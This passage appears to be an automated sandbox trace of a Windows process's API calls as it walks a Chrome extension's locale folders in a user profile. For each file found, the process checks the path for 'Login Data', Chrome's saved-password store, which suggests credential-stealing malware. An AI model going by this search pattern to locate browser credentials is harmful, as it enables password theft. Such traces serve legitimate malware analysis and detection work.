HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\", lpString2="en_GB" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\en_GB") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\en_GB" [0161.682] VirtualQuery (in: lpAddress=0x925cc0, lpBuffer=0x2de928, dwLength=0x1c | out: lpBuffer=0x2de928*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.682] GetProcessHeap () returned 0x8e0000 [0161.682] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x925cc0 | out: hHeap=0x8e0000) returned 1 [0161.682] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\en_GB") returned 140 [0161.682] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\en_GB") returned 140 [0161.682] lstrlenW (lpString="\\*.*") returned 4 [0161.682] GetProcessHeap () returned 0x8e0000 [0161.682] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x122) returned 0x91a0a8 [0161.682] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\en_GB" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\en_GB") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\en_GB" [0161.682] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\en_GB", lpString2="\\*.*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\en_GB\\*.*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\en_GB\\*.*" [0161.682] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\en_GB\\*.*", lpFindFileData=0x2de700 | out: lpFindFileData=0x2de700*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x864ed410, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x865396d0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x865396d0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x69006c, dwReserved1=0x690065, cFileName=".", cAlternateFileName="")) returned 0x8f9c00 [0161.682] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0161.682] FindNextFileW (in: hFindFile=0x8f9c00, lpFindFileData=0x2de700 | out: lpFindFileData=0x2de700*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x864ed410, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x865396d0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x865396d0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x69006c, dwReserved1=0x690065, cFileName="..", cAlternateFileName="")) returned 1 [0161.682] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0161.682] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0161.683] FindNextFileW (in: hFindFile=0x8f9c00, lpFindFileData=0x2de700 | out: lpFindFileData=0x2de700*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x865396d0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x86539ea0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x86833250, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0xd0, dwReserved0=0x69006c, dwReserved1=0x690065, cFileName="messages.json", cAlternateFileName="MESSAG~1.JSO")) returned 1 [0161.683] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\en_GB") returned 140 [0161.683] lstrlenW (lpString="\\") returned 1 [0161.683] GetProcessHeap () returned 0x8e0000 [0161.683] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x11c) returned 0x91b1e0 [0161.683] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\en_GB" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\en_GB") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\en_GB" [0161.683] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\en_GB", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\en_GB\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\en_GB\\" [0161.683] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\en_GB\\") returned 141 [0161.683] lstrlenW (lpString="messages.json") returned 13 [0161.683] GetProcessHeap () returned 0x8e0000 [0161.683] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x136) returned 0x91b308 [0161.683] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\en_GB\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\en_GB\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\en_GB\\" [0161.683] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\en_GB\\", lpString2="messages.json" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\en_GB\\messages.json") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\en_GB\\messages.json" [0161.683] VirtualQuery (in: lpAddress=0x91b1e0, lpBuffer=0x2de6b0, dwLength=0x1c | out: lpBuffer=0x2de6b0*(BaseAddress=0x91b000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0xc000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.683] GetProcessHeap () returned 0x8e0000 [0161.683] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x91b1e0 | out: hHeap=0x8e0000) returned 1 [0161.683] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\en_GB\\messages.json", lpSrch="Login Data") returned 0x0 [0161.683] VirtualQuery (in: lpAddress=0x91b308, lpBuffer=0x2de6bc, dwLength=0x1c | out: lpBuffer=0x2de6bc*(BaseAddress=0x91b000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0xc000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.683] GetProcessHeap () returned 0x8e0000 [0161.683] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x91b308 | out: hHeap=0x8e0000) returned 1 [0161.683] FindNextFileW (in: hFindFile=0x8f9c00, lpFindFileData=0x2de700 | out: lpFindFileData=0x2de700*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x865396d0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x86539ea0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x86833250, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0xd0, dwReserved0=0x69006c, dwReserved1=0x690065, cFileName="messages.json", cAlternateFileName="MESSAG~1.JSO")) returned 0 [0161.683] FindClose (in: hFindFile=0x8f9c00 | out: hFindFile=0x8f9c00) returned 1 [0161.683] VirtualQuery (in: lpAddress=0x91a0a8, lpBuffer=0x2de6bc, dwLength=0x1c | out: lpBuffer=0x2de6bc*(BaseAddress=0x91a000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0xd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.683] GetProcessHeap () returned 0x8e0000 [0161.683] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x91a0a8 | out: hHeap=0x8e0000) returned 1 [0161.683] VirtualQuery (in: lpAddress=0x925dd8, lpBuffer=0x2de934, dwLength=0x1c | out: lpBuffer=0x2de934*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.683] GetProcessHeap () returned 0x8e0000 [0161.683] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x925dd8 | out: hHeap=0x8e0000) returned 1 [0161.683] FindNextFileW (in: hFindFile=0x8f9bc0, lpFindFileData=0x2de978 | out: lpFindFileData=0x2de978*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x865396d0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x865396d0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x865396d0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x69006c, dwReserved1=0x690065, cFileName="en_US", cAlternateFileName="")) returned 1 [0161.683] lstrcmpiW (lpString1="en_US", lpString2=".") returned 1 [0161.683] lstrcmpiW (lpString1="en_US", lpString2="..") returned 1 [0161.683] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales") returned 134 [0161.683] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales") returned 134 [0161.684] lstrlenW (lpString="\\") returned 1 [0161.684] GetProcessHeap () returned 0x8e0000 [0161.684] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x110) returned 0x925cc0 [0161.684] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales" [0161.684] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\" [0161.684] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\") returned 135 [0161.684] lstrlenW (lpString="en_US") returned 5 [0161.684] GetProcessHeap () returned 0x8e0000 [0161.684] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x11a) returned 0x925dd8 [0161.684] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\" [0161.684] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\", lpString2="en_US" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\en_US") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\en_US" [0161.684] VirtualQuery (in: lpAddress=0x925cc0, lpBuffer=0x2de928, dwLength=0x1c | out: lpBuffer=0x2de928*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.684] GetProcessHeap () returned 0x8e0000 [0161.684] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x925cc0 | out: hHeap=0x8e0000) returned 1 [0161.684] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\en_US") returned 140 [0161.684] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\en_US") returned 140 [0161.684] lstrlenW (lpString="\\*.*") returned 4 [0161.684] GetProcessHeap () returned 0x8e0000 [0161.684] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x122) returned 0x91a0a8 [0161.684] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\en_US" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\en_US") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\en_US" [0161.684] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\en_US", lpString2="\\*.*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\en_US\\*.*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\en_US\\*.*" [0161.684] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\en_US\\*.*", lpFindFileData=0x2de700 | out: lpFindFileData=0x2de700*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x865396d0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x865396d0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x865396d0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x69006c, dwReserved1=0x690065, cFileName=".", cAlternateFileName="")) returned 0x8f9c00 [0161.685] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0161.685] FindNextFileW (in: hFindFile=0x8f9c00, lpFindFileData=0x2de700 | out: lpFindFileData=0x2de700*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x865396d0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x865396d0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x865396d0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x69006c, dwReserved1=0x690065, cFileName="..", cAlternateFileName="")) returned 1 [0161.685] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0161.685] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0161.685] FindNextFileW (in: hFindFile=0x8f9c00, lpFindFileData=0x2de700 | out: lpFindFileData=0x2de700*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x865396d0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x86539ea0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x86833250, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0xd1, dwReserved0=0x69006c, dwReserved1=0x690065, cFileName="messages.json", cAlternateFileName="MESSAG~1.JSO")) returned 1 [0161.685] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\en_US") returned 140 [0161.685] lstrlenW (lpString="\\") returned 1 [0161.685] GetProcessHeap () returned 0x8e0000 [0161.685] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x11c) returned 0x91b1e0 [0161.685] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\en_US" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\en_US") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\en_US" [0161.685] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\en_US", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\en_US\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\en_US\\" [0161.685] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\en_US\\") returned 141 [0161.685] lstrlenW (lpString="messages.json") returned 13 [0161.685] GetProcessHeap () returned 0x8e0000 [0161.685] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x136) returned 0x91b308 [0161.685] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\en_US\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\en_US\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\en_US\\" [0161.685] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\en_US\\", lpString2="messages.json" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\en_US\\messages.json") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\en_US\\messages.json" [0161.685] VirtualQuery (in: lpAddress=0x91b1e0, lpBuffer=0x2de6b0, dwLength=0x1c | out: lpBuffer=0x2de6b0*(BaseAddress=0x91b000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0xc000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.685] GetProcessHeap () returned 0x8e0000 [0161.685] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x91b1e0 | out: hHeap=0x8e0000) returned 1 [0161.685] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\en_US\\messages.json", lpSrch="Login Data") returned 0x0 [0161.685] VirtualQuery (in: lpAddress=0x91b308, lpBuffer=0x2de6bc, dwLength=0x1c | out: lpBuffer=0x2de6bc*(BaseAddress=0x91b000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0xc000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.686] GetProcessHeap () returned 0x8e0000 [0161.686] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x91b308 | out: hHeap=0x8e0000) returned 1 [0161.686] FindNextFileW (in: hFindFile=0x8f9c00, lpFindFileData=0x2de700 | out: lpFindFileData=0x2de700*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x865396d0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x86539ea0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x86833250, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0xd1, dwReserved0=0x69006c, dwReserved1=0x690065, cFileName="messages.json", cAlternateFileName="MESSAG~1.JSO")) returned 0 [0161.686] FindClose (in: hFindFile=0x8f9c00 | out: hFindFile=0x8f9c00) returned 1 [0161.686] VirtualQuery (in: lpAddress=0x91a0a8, lpBuffer=0x2de6bc, dwLength=0x1c | out: lpBuffer=0x2de6bc*(BaseAddress=0x91a000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0xd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.686] GetProcessHeap () returned 0x8e0000 [0161.686] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x91a0a8 | out: hHeap=0x8e0000) returned 1 [0161.686] VirtualQuery (in: lpAddress=0x925dd8, lpBuffer=0x2de934, dwLength=0x1c | out: lpBuffer=0x2de934*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.686] GetProcessHeap () returned 0x8e0000 [0161.686] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x925dd8 | out: hHeap=0x8e0000) returned 1 [0161.686] FindNextFileW (in: hFindFile=0x8f9bc0, lpFindFileData=0x2de978 | out: lpFindFileData=0x2de978*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x865396d0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x865396d0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x865396d0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x69006c, dwReserved1=0x690065, cFileName="es", cAlternateFileName="")) returned 1 [0161.686] lstrcmpiW (lpString1="es", lpString2=".") returned 1 [0161.686] lstrcmpiW (lpString1="es", lpString2="..") returned 1 [0161.686] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales") returned 134 [0161.686] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales") returned 134 [0161.686] lstrlenW (lpString="\\") returned 1 [0161.686] GetProcessHeap () returned 0x8e0000 [0161.686] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x110) returned 0x925cc0 [0161.686] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User 